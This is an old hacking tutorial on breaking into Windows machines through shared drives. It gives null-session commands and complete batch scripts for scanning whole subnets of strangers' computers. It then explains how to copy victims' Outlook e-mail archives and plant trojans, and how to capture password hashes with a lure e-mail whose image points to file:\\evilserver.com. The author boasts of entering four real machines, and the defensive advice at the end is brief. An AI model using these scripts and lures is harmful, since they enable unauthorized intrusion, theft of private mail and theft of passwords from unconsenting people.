Open source software security

Madirish Tutorial 10

30 November -0001
Windows shares are probably one of the easiest ways to get unauthorized access to a remote computer. Most people enable shares for convenience, but Windows NT will, by default, share its primary hard drives for administrative purposes. Most shares can be controlled fairly well by users. The NT shares, however, cannot be shut down or changed, even by the Administrator. Windows shares operate on ports 137 and 139. The protocol uses a challenge response that reveals its most basic vulnerability.

When one computer wants to access are share on another computer it sends a request for a share. This request is acknowledged and authenticated by the share server based on its rules for access (either to the share or to the server itself). Thus if a user requests a share from an NT server, and that user is an authenticated user on the NT server they are granted access. If the user requests a share from a simple Windows 98 share server then the server authenticates based on any password protection set on the share. The problem with this scenario is that when I request a share from a server, by default I request the share as myself. This means that the client sends a request similar to: "user jkeane in workgroup svnet with password xxxxx requests the share WHATEVER from your server." You quickly see that sending a password is bad news. Now, the password is encrypted, but it is encrypted using know methods. The failure in the architecture is to send a workgroup, username, and password regardless of whether or not they are required. This means that if I have my server set up to grab incoming passwords, I can crack them.

"How can I exploit these services?" you might ask. Well, the simplest way is to use NETBIOS null sessions to explore shares. You can establish a null session fairly easily assuming the server doesn't request passwords for the null session. NT is pretty rigorous about requesting passwords if its shares are protected, but Windows 98 seems pretty vulnerable, in my experience. To establish a null session all you have to do is type in:

C:>net use //123.123.123.123/ipc$

Where 123.123.123.123 is the actual IP address of the target. There are only two possible responses to this query. The command will succeed and issue a "the command completed successfully" statement, or it will throw an error and fail. If the command succeeds you'll need to go on and explore what shares are available. To do this simply execute the following:

C:>net view //123.123.123.123

The target will respond with a list of possible shares. The following is a result I received from a sample target:

Shared resources at \\123.123.123.123Share name   	Type         Used as  	Comment
-------------------------------------------------------------------------------
Downloads    	Disk                                                              
Pub          	Disk                                                              
The command completed successfully.

The most common share available online is usually a printer share, which is fairly difficult to leverage. However, if you scan two or three subnets you're bound to run across some poor idiot who has shared his entire C: drive. Once you've identified a share the simplest way to leverage access is to map one of the remote shares to a local drive. In order to say map the remote share 'Pub' as a local X: drive execute the following:

C:>net use x: \\123.123.123.123\Pub

If the resource is in fact password protected beyond basic user authentication (or lack thereof) you will be prompted to enter the password. Usually if a C: drive is shared over the internet though, the user is so clueless that further password protection is unlikely. Once the drive is mapped simply use the Windows GUI through 'My Computer' to upload, download, explore and execute the contents of the remote drive.

Scanning for shares, however is tedious and time consuming. Since all the scan consists of is a repetitive issuance of DOS commands (or executables available from a DOS prompt) the simplest way to speed up your search is to create a batch file. Batch files are Windows shell scripts, a file that consists of DOS commands that are issued in sequence when the batch file is called. The best known batch file is autoexec.bat. Batch files are creatable and readable from notepad. To create a batch file simply open notepad, write up the commands and save the file as 'somebat.bat'. You should be sure to enclose the title in quotation marks when saving it so that Notepad will save the file as a .bat rather than its default of .txt.

The problem with writing a batch file to scan a subnet is that batch files are of VERY limited utility. You cannot set a variable and then increment it using an arithmetic function. It is simply impossible to set a variable equal to a number then reset the variable to its original number plus one. The only way, say to increment 'x' from one to two is to set x equal to one, then explicitly set x equal to two. To use a batch file that will increment you have to call another batch file that simply allows for incrementing (checking a variable then resetting it to one higher). The following is the text of add.bat, showing how this can be accomplished across a subnet (255 numbers).

:: ADD.BAT
:: Increments a three digit number
:: Works by comparing each digit
:: H=hundreds, T=tens, D=digits
@echo off
if [%H%]==[] set H=0
if [%T%]==[] set T=0
if [%D%]==[] set D=0
:DIGITS
if %D%==9 goto TENS
if %D%==8 set D=9
if %D%==7 set D=8
if %D%==6 set D=7
if %D%==5 set D=6
if %D%==4 set D=5
if %D%==3 set D=4
if %D%==2 set D=3
if %D%==1 set D=2
if %D%==0 set D=1
goto DONE
:TENS
set D=0
if %T%==9 goto HUNDREDS
if %T%==8 set T=9
if %T%==7 set T=8
if %T%==6 set T=7
if %T%==5 set T=6
if %T%==4 set T=5
if %T%==3 set T=4
if %T%==2 set T=3
if %T%==1 set T=2
if %T%==0 set T=1
goto DONE
:HUNDREDS
set T=0
if %H%==9 set H=0
if %H%==8 set H=9
if %H%==7 set H=8
if %H%==6 set H=7
if %H%==5 set H=6
if %H%==4 set H=5
if %H%==3 set H=4
if %H%==2 set H=3
if %H%==1 set H=2
if %H%==0 set H=1
goto DONE
:DONE

As you can see this is rather clunky and inefficient. However, combined with the next batch file, you can create a simple, yet effective scanner. The batch file below scans across a subnet, first pinging hosts with one packet of data to see if they are alive, then attempting to establish a null session, logging the vulnerable system, enumerating and logging the shares, and finally requesting and logging nbtstat information from the target. All information is logged in vulnerable.txt in the same directory as the batch file. Note that the add.bat file must be in the same directory so that calls to it are completed successfully. Copy this file and save it as madirish.bat then execute it from the command line by issuing:

C:>madirish. 123.123.123

Where 123.123.123 is the subnet you with to scan. I have noticed that the scanner hangs at certain points and must be restarted. To avoid the pain of rescanning the entire subnet, capability has been built in to accept arguments to establish where along the subnet to start. To issue these arguments simply type

C:>madirish 123.123.123 A B C

Where ABC is the starting IP. Make sure to leave spaces between A, B, and C since they are separate arguments to the batch file. The code for madirish.bat follows:

@echo OFF

set SUBNET=%1%

set H=%2
set T=%3
set D=%4

echo Scanning subnet %SUBNET% >> vulnerable.txt

:START
call add.bat

REM lets start testing
ping -n 1 %SUBNET%.%H%%T%%D% | find "out" > nul
if errorlevel 1 goto CONTINUE
goto DEADIP

:CONTINUE
net use \\%SUBNET%.%H%%T%%D%\ipc$ | find "completed" > nul
if errorlevel 1 goto notfound
echo %SUBNET%.%H%%T%%D% >> vulnerable.txt
echo Got One!  %SUBNET%.%H%%T%%D% is vulnerable!
net view \\%SUBNET%.%H%%T%%D% >> vulnerable.txt
nbtstat -A %SUBNET%.%H%%T%%D% >> vulnerable.txt
goto endfind

:notfound
echo %SUBNET%.%H%%T%%D% doesn't seem to be vulnerable
:endfind


if %H%%T%%D%==254 goto DONE
goto START


:DEADIP
echo %SUBNET%.%H%%T%%D% doesn't seem to be alive
goto START

:DONE
@echo ON

If you invoke multiple DOS command prompts at once you can execute this batch file two or three times (one in each prompt) and speed up your subnet scans. If you get a vulnerable host, the batch will have already established a null session, so all you have to do is scan the text log file and establish connections to remote shares.

Using this scanner sporadically over one weekend I was able to connect to a total of 4 remote machines (scanning approximately 9 subnets). Such was the level of insecurity that you could pull Outlook archive file (backup.pst) from C:\Windows\Local Settings\Application Data\Microsoft\Outlook\archive.pst from every vulnerable machine. Once you've copied this file you can import it into your Outlook and peruse the victim's e-mail. You can gain other valuable information by copying other identity data (such as contact list or even the contents of the My Documents folder). Trojaning a target becomes trivial once you have access of this level.

Another method for gaining access, especially if the target has password protected shares, is to trick the target into requesting a share from a server you control. This will cause the target to send a request, including their username and encrypted password. The password can be cracked fairly trivially with L0phtCrack, which even includes a SMB packet sniffer to capture the request. Tricking a machine into requesting a share is as simple as getting the target to view a linked file (either in an HTML e-mail or web page). To code a share simply substitute the absolute or relative link with the following:

File:\\evilserver.com\evilshare\fake.jpg

You can use this formula most easily as an image source (<img src="file:\\....). Once captured, the password can be easily cracked. All you need is a suitable NT server to host the share and run L0phtCrack on.

So, to enumerate this process in full, I'll assume I've selected a target machine. The first step is to set up my NT password grabber. I download L0phtCrack and install it on the machine, making sure to start the SMB packet capture option. Next, on the desktop I create a folder called 'evilshare' and share it with permissions to allow 'Everyone' access. Then I create a small picture or one pixel by one pixel image (or web bug if you prefer) and store it in the evilshare directory. Next I switch over to Outlook and compose a message. I write up a fake spam e-mail say with the title 'sexy pics of our models - FOR YOU!' and place the cursor inside the message. Then I go to the Outlook options and select 'insert' then 'image' which opens a dialog box asking for the image's location. Simply type in file:\\evilserver\evilshare\fake.jpg where evilserver is the domain name (or IP address) of my NT server. Then I ship off the e-mail and wait. As soon as the target views the e-mail you'll see his share information show up in the SMB capture window of L0phtCrack. Save this information, import it into L0phtCrack's password cracking window and run the crack on it. Chances are if you have a good dictionary you'll get the password pretty quickly. You can find the target fairly easily since in order to grab the image they will have had to establish a share session with you. Type 'netstat' into a DOS prompt and you should see the victim. Viewing his shares or establishing a null connection should be easy at that point since you've got the correct username and password.

How can you protect yourself? Don't ever enable sharing, or if you do make sure you provide strong password protection of your shares. Alternatively you can set up a firewall that blocks all remote SMB requests. This is probably the most effective solution since it allows members of your LAN to share files with minimal risk. NEVER EVER SHARE YOUR ENTIRE HARD DRIVE. This is just stupid and I can't think of any justifiable reason to do it. Once your shares are no longer necessary be sure to disable them. Windows 98/Me is a fairly benign operating system since it doesn't function as a network operating system, but opening shares makes all that worthless.